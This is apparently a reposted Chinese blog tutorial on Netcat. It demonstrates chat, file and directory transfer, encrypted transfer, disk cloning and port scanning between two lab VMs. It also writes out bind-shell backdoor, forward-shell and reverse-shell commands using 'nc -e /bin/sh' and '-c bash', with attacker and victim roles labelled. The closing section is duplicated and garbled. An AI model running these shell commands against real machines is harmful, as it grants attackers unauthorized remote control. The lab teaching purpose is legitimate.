当前位置: 首页 > article >正文

Netcat使用学习

article 2025/8/26 10:18:38

一、Netcat简介

**netcat **是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。

netcat 所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。

二、Netcat常用参数:

OpenBSD netcat (Debian patchlevel 1.218-4ubuntu1)
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl][-m minttl] [-O length] [-P proxy_username] [-p source_port][-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit][-w timeout] [-X proxy_protocol] [-x proxy_address[:port]][destination] [port]Command Summary:-4		Use IPv4-6		Use IPv6-b		Allow broadcast-C		Send CRLF as line-ending-D		Enable the debug socket option-d		Detach from stdin-F		Pass socket fd-h		This help text-I length	TCP receive buffer length-i interval	Delay interval for lines sent, ports scanned-k		Keep inbound sockets open for multiple connects-l		Listen mode, for inbound connects-M ttl		Outgoing TTL / Hop Limit-m minttl	Minimum incoming TTL / Hop Limit-N		Shutdown the network socket after EOF on stdin-n		Suppress name/port resolutions-O length	TCP send buffer length-P proxyuser	Username for proxy authentication-p port		Specify local port for remote connects-q secs		quit after EOF on stdin and delay of secs-r		Randomize remote ports-S		Enable the TCP MD5 signature option-s sourceaddr	Local source address-T keyword	TOS value-t		Answer TELNET negotiation-U		Use UNIX domain socket-u		UDP mode-V rtable	Specify alternate routing table-v		Verbose-W recvlimit	Terminate after receiving a number of packets-w timeout	Timeout for connects and final net reads-X proto	Proxy protocol: "4", "5" (SOCKS) or "connect"-x addr[:port]	Specify proxy address and port-Z		DCCP mode-z		Zero-I/O mode [used for scanning]Port numbers can be individual or ranges: lo-hi [inclusive]

三、实验内容

实验设备:
服务端:Kali-linux-2022 
192.168.3.21
客户端:Ubuntu 22.04.1 LTS 
192.168.3.22
1.传输文本信息

nc 可以在两台机器之间相互传递信息,首先需要有一台机器进行监听一个端口,另一台以连接的方式去连接其指定的端口,这样两台机器之间建立了通信后,相互之间可以传输信息。l 参数是监听模式的意思,p 是指定一个端口

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234
hello?
hi?

客户端

root@ubuntu-virtual-machine:/# nc -nv 192.168.3.21 1234
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
hello?
hi?

这种相互传输信息和渗透之间的关系是,电子取证的时候可以用。当机器被攻击后,为了不破坏现场,需要提出大量的信息和文件出来做分析,这时候可以用 nc 的这个机制,例如,需要一个命令的输出信息,首先在一台机器上监听一个端口,随后在被攻击的机器上执行相关的命令,然后以管道给 nc,指定另一台的地址和端口,这样输出结果就会到另一端

2.进行文件传输
文件传输->下载

服务端在/home/kali/下创建log.txt用于记录文件

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 > /home/kali/log.txt

客户端进行nc

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 < openme.txt

回到/home/kali/目录下,查看log.txt

┌──(kali㉿kali)-[~]
└─$ cat log.txt   
If you see me, the file has been successfully downloaded!

image-20221124210632880

文件传输->上传

服务端传输log.txt

┌──(kali㉿kali)-[~]
└─$ nc -lp 1234 < /home/kali/log.txt

客户端接收

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234 > get.txt

root@ubuntu-virtual-machine:/home/ubuntu/桌面# cat get.txt
If you see me, the file has been successfully downloaded!

image-20221124210943981

可以看到已经成功写入了客户端的get.txt文件中

以windows为服务器端,kali为客户端,上述操作相反即可,这里不给出实际应用 如果此时服务端并没有准备好连接,而客户端已经使用NC进行连接, 那么客户端就会一直等待下去,知道连接上服务端,造成一种“假死"状态。 解决方法:设置等待时间

3.传输文件目录

对于传输目录其实和传输文本信息传输文件一样,当作文件处理即可,传输时将目录进行压缩进行传输,随后另一台机器接收后进行解压,这样就完成了目录的传输。例如使用 tar 命令,cvf 进行压缩,xvf 进行解压,c 是压缩的意思,v 是显示详细过程,f 是文件名,x 是解压。

服务端

┌──(kali㉿kali)-[~/Desktop]
└─$ tar cvf - ~/Desktop/ | nc -lp 1234 -q l
tar: Removing leading `/' from member names
/home/kali/Desktop/
/home/kali/Desktop/class two/
/home/kali/Desktop/heard.txt
/home/kali/Desktop/class one/
/home/kali/Desktop/class one/first.pcapng
/home/kali/Desktop/class one/class_two.pcapng
/home/kali/Desktop/class one/class_one.pcapng

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -nv 192.168.3.21 1234 | tar xvf -
Connection to 192.168.3.21 1234 port [tcp/*] succeeded!
home/kali/Desktop/
home/kali/Desktop/class two/
home/kali/Desktop/heard.txt
home/kali/Desktop/class one/
home/kali/Desktop/class one/first.pcapng
home/kali/Desktop/class one/class_two.pcapng
home/kali/Desktop/class one/class_one.pcapng
4.加密传输文件

加密传输文件需要使用 mcrypt 库,linux 系统默认是没有安装的,需要手动安装。随后和传输文件类似,只需要在传输文件时使用 mcrypt 加密即可。

命令用到的参数有,–flush 立即冲洗输出,-F 输出数据,-b 不保留算法信息,-q 关闭一些非严重的警告,-d 解密,首先在接收端监听一个端口,等待另一台进行连接传送文件,随后在要传送的机器上把要传送的文件进行加密使用 nc 连接指定的地址和 ip

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > heard.txt
Enter passphrase:

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# mcrypt --flush -Fbq -a rijndael-256 -m ecb < get.txt | nc -nv 192.168.3.21 1234 -q 1
Enter the passphrase (maximum of 512 characters)
Please use a combination of upper and lower case letters and numbers.
Enter passphrase: Connection to 192.168.3.21 1234 port [tcp/*] succeeded!Enter passphrase:
5.远程克隆硬盘

对于远程克隆硬盘,在远程电子取证时可以用,使用方法需要借助 dd 命令,首先通过 nc 监听一个端口,然后通过 dd 指定要克隆的分区,dd 的 of 参数相当于一个复制功能,然后再另一台机器通过 nc 连接此端口,dd 的 if 参数相当于粘贴的命令。格式如下:

nc -lp 6666 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.228.128 6666 -q 1
6.创建监听型/连接型后门
监听型后门

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ncat -l -e /bin/sh -p 4444

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc -w 10 192.168.3.21 4444
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.3.21  netmask 255.255.255.0  broadcast 192.168.3.255inet6 fe80::8c1d:36a6:b6c7:9d64  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:fd:52:9c  txqueuelen 1000  (Ethernet)RX packets 172820  bytes 37543859 (35.8 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 189400  bytes 52498244 (50.0 MiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 144  bytes 7472 (7.2 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 144  bytes 7472 (7.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
连接型后门

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -ltvp 4444                                             
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:46990.

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
ifconfig
root@ubuntu-virtual-machine:/home/ubuntu/桌面# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.3.22  netmask 255.255.255.0  broadcast 192.168.3.255inet6 fe80::13b7:c830:cef8:924e  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:71:25:8a  txqueuelen 1000  (以太网)RX packets 272375  bytes 159129764 (159.1 MB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 206658  bytes 16759835 (16.7 MB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (本地环回)RX packets 3390  bytes 440132 (440.1 KB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 3390  bytes 440132 (440.1 KB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
7.远程控制/正反shell
正向shell

正向Shell,服务器模式下的 netcat 侦听连接并将外壳进程提供给任何连接的客户端。然后以客户端模式运行的 Netcat 可以连接到服务器并获得对服务器的 shell 访问并运行命令。从渗透测试的角度来看,服务器是受害者机器,客户端是攻击者机器。

服务端

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lp 1234 -c bash

客户端

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 1234
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.3.21  netmask 255.255.255.0  broadcast 192.168.3.255inet6 fe80::8c1d:36a6:b6c7:9d64  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:fd:52:9c  txqueuelen 1000  (Ethernet)RX packets 172760  bytes 37538472 (35.7 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 189345  bytes 52492855 (50.0 MiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 74  bytes 3740 (3.6 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 74  bytes 3740 (3.6 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
反向shell

对于反向 shell,我们在服务器模式下使用 netcat 来侦听连接,然后从客户端提供 shell。这将允许服务器上的会话在收到 shell 后在客户端上运行命令。从渗透测试的角度来看,服务器是攻击者机器,客户端是受害者机器

服务端(攻击方)

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvp 4444                                                           
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.3.22.
Ncat: Connection from 192.168.3.22:59992.
ls
get.txt
hey.txt
home
openme.txt
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.3.22  netmask 255.255.255.0  broadcast 192.168.3.255inet6 fe80::13b7:c830:cef8:924e  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:71:25:8a  txqueuelen 1000  (以太网)RX packets 272035  bytes 159047796 (159.0 MB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 206567  bytes 16752141 (16.7 MB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (本地环回)RX packets 3388  bytes 439992 (439.9 KB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 3388  bytes 439992 (439.9 KB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

客户端(受害方)

root@ubuntu-virtual-machine:/home/ubuntu/桌面# nc 192.168.3.21 4444 -e /bin/sh
8.端口扫描

nc 用来进行端口扫描的命令是 nc -nvz ip 地址 端口号,z 参数翻译过来就是不进行 i/o,用来扫描。意思就是仅仅是去 ping 去探测目标是否开启指定端口,不进行任何的交互。

-n 参数翻译过来就是只接收 ip 地址,没有 dns
-v 参数就是列出执行过程的详细信息
-z 参数默认扫描的是 tcp 类型,如果需要扫描 udp,则需要使用一个新参数 -u

我先在客户机开启了apache2服务

image-20221124204049608

客户机查看端口状态命令netstat -ano

┌──(root㉿kali)-[/home/kali/Desktop]
└─# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
udp        0      0 192.168.3.21:68         192.168.3.1:67          ESTABLISHED off (0.00/0/0)
raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)
Active UNIX domain sockets (servers and established)

apache2服务默认使用的是80端口

nc -nvz 192.168.3.21 70-90

root@ubuntu-virtual-machine:/# nc -nvz 192.168.3.21 70-90
nc: connect to 192.168.3.21 port 70 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 71 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 72 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 73 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 74 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 79 (tcp) failed: Connection refused
Connection to 192.168.3.21 80 port [tcp/*] succeeded!
nc: connect to 192.168.3.21 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused

四、总结

to 192.168.3.21 port 85 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 86 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 87 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 88 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 89 (tcp) failed: Connection refused
nc: connect to 192.168.3.21 port 90 (tcp) failed: Connection refused


### 四、总结Netcat 是用于网络相关活动的非常棒的工具,我发现它在渗透测试中非常有用,实在是一款不可多得的网络测试工具。
http://www.lryc.cn/news/2417818.html

相关文章:

  • Jfinal 框架简单入门
  • ftp客户端使用详细说明【linux和windows】
  • STM32F103C8t6驱动MPU6050+HMC5883L+BMP280进行三轴姿态解算
  • JS 中 String 的字符串截取 substr 和 substring 区别的快速记忆方法
  • Ubuntu——apt-get问题
  • 电子工程师必备网址
  • VNC Server远程桌面配置详解
  • 探秘Magnetissimo:自托管的磁力链接搜索引擎
  • react-native基本介绍
  • Attributes(特性)与 Properties(属性)的区别
  • 架构设计(1)-谈谈架构
  • 12 个超好用的免费在线工具建议收藏!(非常详细)从零基础入门到精通,看完这一篇就够了
  • HTTP部分详细讲解以及代码实现(二)
  • epoll原理详解及epoll反应堆模型
  • NLP深入学习——分词(Segmentation )
  • 算法 001. 辗转相除法(欧几里得算法)求最大公约数
  • 视图的基本操作
  • Linux ps命令详解
  • 关于.NET、ASP.NET和ASP
  • Gson的用法详解_Gson如何进行进行序列化和反序列化
  • python的符号lt和gt怎么输入_lt;lt;Python基础教程gt;gt;学习笔记 | 第04章 | 字典...
  • 科普:SMP系统是什么
  • RISC-V CPU+GPU+AI,Imagination创新解决方案带来了哪些惊喜?
  • WebShell
  • SpringSecurity(安全)基础
  • Oracle数据库CDB与PDB
  • ubuntu搜狗输入法
  • 日期操作类(DateFormat与SimpleDateFormat)的区别和使用详解
  • Java中Map详解
  • SQL中的like语句用法